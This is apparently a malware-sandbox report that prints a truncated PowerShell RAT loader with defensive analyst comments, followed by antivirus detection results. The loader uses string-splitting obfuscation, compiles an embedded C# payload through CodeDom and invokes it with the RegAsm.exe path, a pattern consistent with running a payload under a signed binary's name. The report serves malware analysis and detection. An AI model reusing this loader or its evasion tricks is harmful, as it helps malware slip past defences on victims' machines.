Static | ZeroBOX
No static analysis available.
#by code 3losh rat
# Load the .NET assemblies the script uses later; Microsoft.CSharp supplies the
# CSharpCodeProvider used in CodeDom, and the same libraries are later passed to
# the compiler as references.
Add-Type -AssemblyName System.Windows.Forms
Add-Type -AssemblyName Microsoft.VisualBasic
Add-Type -AssemblyName Microsoft.CSharp
Add-Type -AssemblyName System.Management
# Embedded blob #1, stored as a decimal byte array. The leading 31,139,8 is the
# gzip magic (0x1F 0x8B) followed by the deflate method byte, so this is
# gzip-compressed data. It is later passed to CodeDom, which inflates it and
# compiles the result as C# source text.
# NOTE(review): the array is cut off in this capture (no closing parenthesis), so
# the blob cannot be recovered from this page alone.
[Byte[]] $ALOSH = @(31,139,8,0,0,0,0,0,4,0,237,189,7,96,28,73,150,37,38,47,109,202,123,127,74,245,74,215,224,116,161,8,128,96,19,36,216,144,64,16,236,193,136,205,230,146,236,29,105,71,35,41,171,42,129,202,101,86,101,93,102,22,64,204,237,157,188,247,222,123,239,189,247,222,123,239,189,247,186,59,157,78,39,247,223,255,63,92,102,100,1,108,246,206,74,218,201,158,33,128,170,200,31,63,126,124,31,63,34,214,77,177,188,72,95,95,55,109,190,56,252,141,19,255,207,241,211,34,187,88,86,77,91,76,155,238,87,175,214,203,182,88,228,227,179,101,155,215,213,234,117,94,95,22,211,220,53,251,162,152,214,85,83,157,183,227,159,44,154,117,86,62,201,154,98,74,223,254,198,201,50,91,228,205,42,155,230,233,170,174,126,250,217,87,79,127,227,228,23,255,198,73,74,207,106,61,41,139,105,218,180,25,245,152,78,203,172,105,210,151,199,242,157,54,233,55,107,218,26,253,189,202,47,243,186,201,95,243,95,91,250,33,253,117,199,189,231,129,192,227,94,164,223,210,207,210,143,62,58,12,27,20,203,54,125,158,47,47,218,121,231,11,249,144,94,33,248,99,253,99,5
# Decompress: inflate a gzip-compressed byte array and return the raw bytes.
#   -byteArray : gzip data (mandatory; also accepted from the pipeline).
#   Returns    : [byte[]] with the decompressed content.
# NOTE(review): the closing ")" of Param and the closing braces of the Process
# block and the function are not visible in this capture.
Function Decompress {
[CmdletBinding()]
Param (
[Parameter(Mandatory,ValueFromPipeline,ValueFromPipelineByPropertyName)]
[byte[]] $byteArray = $(Throw("-byteArray is required"))
Process {
# Wrap the compressed bytes in a stream. The unary comma stops PowerShell from
# spreading the array into separate constructor arguments.
# NOTE(review): $input is a PowerShell automatic variable; it is reused here as
# an ordinary local.
$input = New-Object System.IO.MemoryStream( , $byteArray )
$output = New-Object System.IO.MemoryStream
# Standard .NET gzip reader in Decompress mode over the input stream.
$gzipStream = New-Object System.IO.Compression.GzipStream $input, ([IO.Compression.CompressionMode]::Decompress)
$gzipStream.CopyTo( $output )
$gzipStream.Close()
$input.Close()
# $output is never closed or disposed; its buffer is only copied out.
[byte[]] $byteOutArray = $output.ToArray()
return $byteOutArray
# CodeDom: compile an embedded C# source blob at run time and call one static
# method of the resulting assembly by reflection.
#   $BB : gzip-compressed C# source text
#   $TP : full name of the type to look up in the compiled assembly
#   $MT : name of the method to invoke on that type
# Analyst notes (defensive reading of what the visible lines do):
#   * Several strings are built with .Replace() on junk placeholders or with
#     character-by-character concatenation, so literals such as
#     "CompilerVersion", "System.dll" and "RegAsm.exe" never appear whole in the
#     file. Detections should not rely on those literals being present.
#   * CSharpCodeProvider on .NET Framework normally compiles by launching csc.exe
#     with temporary files, even when GenerateInMemory is set, so a
#     powershell.exe -> csc.exe process chain is a useful hunting signal.
#   * NOTE(review): the "try {" that pairs with the final "} catch { }" is not
#     visible in this capture, and the byte array below is cut off.
function CodeDom([Byte[]] $BB, [String] $TP, [String] $MT) {
# Provider options: key "CompilerVersion" (assembled via Replace) -> "v4.0".
$dictionary = new-object 'System.Collections.Generic.Dictionary[[string],[string]]'
$hello = "Com<><><><><><><".Replace("<><><><><><><","pilerVersion")
$v4 = "v4.0"
$dictionary.Add($hello, $v4)
$CsharpCompiler = New-Object Microsoft.CSharp.CSharpCodeProvider($dictionary)
$CompilerParametres = New-Object System.CodeDom.Compiler.CompilerParameters
# Referenced assemblies: System.dll and System.Management.dll (both names built
# through Replace), then System.Windows.Forms.dll, mscorlib.dll and
# Microsoft.VisualBasic.dll given in plain text.
$v1 = "Sys@@@".Replace("@@@","tem.dll")
$CompilerParametres.ReferencedAssemblies.Add($v1)
$CompilerParametres.ReferencedAssemblies.Add("System.!@!$^^%^%**&*&*$$%$%$".Replace("!@!$^^%^%**&*&*$$%$%$","Management.dll"))
$CompilerParametres.ReferencedAssemblies.Add("System.Windows.Forms.dll")
$CompilerParametres.ReferencedAssemblies.Add("mscorlib.dll")
$CompilerParametres.ReferencedAssemblies.Add("Microsoft.VisualBasic.dll")
# Build a library with no debug info and no executable output, requested as an
# in-memory assembly; x86 target with unsafe code allowed.
$CompilerParametres.IncludeDebugInformation = $false
$CompilerParametres.GenerateExecutable = $false
$CompilerParametres.GenerateInMemory = $true
$CompilerParametres.CompilerOptions += "/platform:X86 /unsafe /target:library"
# Inflate blob #1 and compile it as C# source, decoded with the system default
# code page.
$BB = Decompress($BB)
[System.CodeDom.Compiler.CompilerResults] $CompilerResults = $CsharpCompiler.CompileAssemblyFromSource($CompilerParametres, [System.Text.Encoding]::Default.GetString($BB))
[Type] $T = $CompilerResults.CompiledAssembly.GetType($TP)
# Embedded blob #2: a second gzip stream (same 31,139,8 header), inflated into
# $Bytes and handed to the invoked method as its second argument. Its content is
# not identifiable from this truncated capture.
[Byte[]] $Bytes = Decompress(@(31,139,8,0,0,0,0,0,4,0,156,61,7,92,19,73,247,73,8,73,8,53,4,18,154,240,20,193,200,218,235,218,177,96,63,245,44,39,172,138,46,234,217,141,138,29,177,247,222,176,247,179,247,222,187,158,189,157,103,87,176,215,179,247,6,254,223,155,217,64,240,188,251,254,223,231,143,117,119,103,102,103,222,123,243,230,181,41,249,73,154,168,114,81,169,84,90,188,190,125,83,169,182,171,248,191,104,213,127,254,55,16,47,175,176,157,94,170,205,110,167,115,110,87,215,62,157,179,97,219,118,137,208,165,155,189,77,55,185,19,180,148,59,119,182,119,135,132,214,208,173,71,103,104,215,25,170,212,109,0,157,236,173,90,23,240,244,52,230,86,234,168,23,163,82,213,86,187,168,110,55,252,69,118,212,123,75,165,81,187,171,13,42,213,61,124,209,241,180,242,46,106,149,10,240,1,212,28,58,122,214,112,184,85,170,172,187,170,133,154,165,171,88,118,244,48,149,202,135,253,101,221,51,111,236,223,61,141,90,213,88,197,235,157,163,249,1,146,209,106,149,199,255,131,22,127,251,135,240,25,156,94,13,248,94,221,233,189,64,247,214,189,187,2
# "RegAsm.exe" assembled one character at a time, then joined to the .NET runtime
# directory. "Framework64" is rewritten to "Framework", i.e. the 32-bit
# framework directory, consistent with the /platform:X86 compile option above.
$nan = "R"+"e"+"g"+"A"+"s"+"m"+"."+"e"+"x"+"e"
[String] $MyPt = [System.IO.Path]::Combine([System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory(),$nan)
[Object[]] $Params=@($MyPt.Replace("F"+"r"+"a"+"m"+"e"+"w"+"or"+"k"+"6"+"4","F"+"r"+"a"+"mew"+"o"+"r"+"k") ,$Bytes)
# Reflection call of the static method $MT with (path to RegAsm.exe, $Bytes).
# NOTE(review): what that method does is defined in the compiled source, which
# is not visible here. Passing the path of a signed framework binary together
# with a byte blob is consistent with running a payload under that binary's
# name; confirm by inflating blob #1 in an isolated analysis environment.
return $T.GetMethod($MT).Invoke($null, $Params)
# The empty catch swallows every error, so a failed compile or invoke leaves no
# visible output.
} catch { }
# Entry point of the script: pause for 1000 ms, then run the loader.
[System.Threading.Thread]::Sleep(1000)
# Type name "projFUD.PA" and method name "Execute", both assembled by character
# concatenation so that neither string appears whole in the file.
$xx = "p"+"r"+"o"+"j"+"F"+"U"+"D"+"."+"P"+"A"
$tata = "E"+"x"+"e"+"c"+"u"+"t"+"e"
# Compile blob #1 ($ALOSH) and invoke projFUD.PA.Execute from the result.
CodeDom $ALOSH ($xx) ($tata)
#by code 3losh rat
Antivirus Signature
Bkav Clean
Lionic Clean
DrWeb PowerShell.Packed.50
MicroWorld-eScan Clean
FireEye Clean
CAT-QuickHeal Clean
ALYac Clean
Malwarebytes Clean
VIPRE Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
BitDefenderTheta Clean
Cyren Clean
Symantec Clean
ESET-NOD32 PowerShell/TrojanDropper.Agent.NO
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Trj]
ClamAV Clean
Kaspersky HEUR:Trojan.PowerShell.Invoker.gen
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
Rising Clean
Ad-Aware Clean
Sophos Clean
Comodo Clean
F-Secure Clean
Baidu Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition PS/Agent.eo
CMC Clean
Emsisoft Clean
Ikarus Trojan-Dropper.PowerShell.Agent
GData Clean
Jiangmin Clean
Avira VBS/Agent.PRG
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.PowerShell.Invoker.gen
Microsoft Clean
Cynet Malicious (score: 99)
AhnLab-V3 Clean
McAfee PS/Agent.eo
MAX Clean
VBA32 Clean
Zoner Clean
Tencent Clean
Yandex Clean
TACHYON Clean
MaxSecure Clean
Fortinet PowerShell/Agent.NO!tr
AVG Script:SNH-gen [Trj]
Panda Clean
No IRMA results available.